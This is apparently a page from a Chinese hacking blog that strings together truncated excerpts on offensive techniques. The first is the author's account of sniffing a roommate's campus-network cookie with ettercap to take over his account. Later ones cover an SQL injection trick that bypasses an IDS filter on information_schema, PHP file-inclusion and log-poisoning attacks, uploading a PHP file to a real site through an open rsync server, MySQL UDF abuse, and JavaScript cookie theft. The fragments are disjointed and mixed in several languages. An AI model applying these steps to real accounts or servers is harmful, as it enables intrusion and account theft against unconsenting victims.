昨天跟某舍友下象棋,说谁输了就买雪糕给对方吃。
男子汉大豆腐,焉能言而无信,谁料在我将死对方后,对方居然真的使用了绝技,死不认帐,耍赖皮。
俺只好将其行公布于校内网,结果连我们导师都鄙视那种行为,并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器,在校内网颠倒是非、指鹿为马。偶只好进入其校内网,断其话语权,还事实真想于大众。
本来那厮用的网页登录很容易搞到其密码,谁知最近用了个校内网客户端,从那里进入网页,也就不用登录了。这下好,搞不到密码就搞他的cookie吧,反正一样。
ettercap出场,贴图
绕过IDS过滤information_schema继续注入
来源:http://key0.cn/index.php/archives/510
mickey写的,正文如下:
原来做渗透的时候,遇到过一个站,IDS过滤了information_schema,导致后来我没有搞定,前天看文章,发现一个绕过的方法,本地测试了下,也和月牛讨论了下,最后在月牛的帮助下,把语句都构造好了,原来那个点,回去再看,也就搞定了,后来被当哥把方法给放出来了,那就公布吧。
1.本地构造测试表
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2.暴列名
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’
阅读全文…
_ _
(_) | |
_ _ ____ ____ _ __| | ___ _ __ ___
| | ‘_ \ \ / / _` |/ _` |/ _ \ ‘__/ __|
| | | | \ V / (_| | (_| | __/ | \__ \
|_|_| |_|\_/ \__,_|\__,_|\___|_| |___/
Forum Invaders (Un)Security Team
Titulo: Web Apps Firgerprinting
Autor : fvox of forum-invaders.com.br
Data : 22.04.2010
##########################
Índice – Web Apps Fingerprinting
##########################
Firgerprinting
[0x00] – Introdução
[0x01] – Ferramentas Online
[0x02] – HTML Codes
[0x03] – Manuais de instalação
本文章简单摘要:一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是这样。
一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕
include() && require()语句:包括并运行指定文件。
这两种结构除了在如何处理失败之外完全一样。include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用 require()。include() 就不是这样,脚本会继续运行。
如果”allow_url_fopen”在 PHP 中被激活(默认配置),也可以用 URL(通过 HTTP 或者其它支持的封装协议)而不是本地文件来指定要被包括的文件。如果目标服务器将目标文件作为 PHP 代码解释,则可以用适用于 HTTP GET 的 URL 请求字符串来向被包括的文件传递变量。
详细参考:http://www.phpe.net/manual/function.include.php 阅读全文…
Local File Inclusion
As the title says, this is a “short” and descriptive guide about
various methods to exploit using a local file inclusion (LFI).
I will cover the following topics:
•Poison NULL Bytes
•Log Poisoning
•/proc/self/
•Alternative Log Poisoning
•Malicious image upload
•Injection of code by the use of e-mails
•Creativity
By: Fredrik Nordberg Almroth
URL: http://h.ackack.net/
So the question is. What is a LFI?
A LFI is, as the title says,
a method for servers/scripts to include local files on run-time,
in order to make complex systems of procedure calls.
Well most of the time, you find the LFI vulnerabilities in URL’s
of the web pages.
Mainly because developers tend to like the use of GET requests
when including pages.
Nothing more. Nothing less.
阅读全文…
转自:kindle’s blog
1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book
看相应的下级目录(注意一定要在目录后面添加上/)
rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
成功上传
来源:http://hi.baidu.com/ylbhz
Linux平台下 MYSQL用户自定义函数(UDF)的利用
Chris Anley [chris@ngssoftware.com] 5th July 2004
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
通过CREATE FUNCTION语句来实现这一机制,同时通过向’mysql.func’表录入信息来加载他们.
通常当MYSQL加载这些动态库时,该动态库文件路径必须能被MYSQL访问.
攻击者会滥用这一机制别有用心地创建一些“恶毒”的动态库文件并将它们通过SELECT … INTO OUTFILE语句写入可用的目录.当这些文件创建成功过后,攻击者通过insert向mysql.func表录入信息以配置MYSQL加载这些动态库文件和执行这些函数。
下面是一段相当简单的UDF链接库的代码 (请原谅他很简陋)(老外真有礼貌!):
阅读全文…
Hacking With Javascript
I was asked over msn about hacking with javascript and i realised that people understimate the value of javascript hacking. so i decided to post an article thats shows how powerful javascript could be.
———————————————————————–
things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull’s javascript exploits, and the about:// exploit. Since so many people were asking when this tutorial would come out I decided to finally put it up. I’d appriecated some feedback. Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :(
-idea: cross site scriptting by opening a new page in a frame and then writting to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.
Intro
Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.
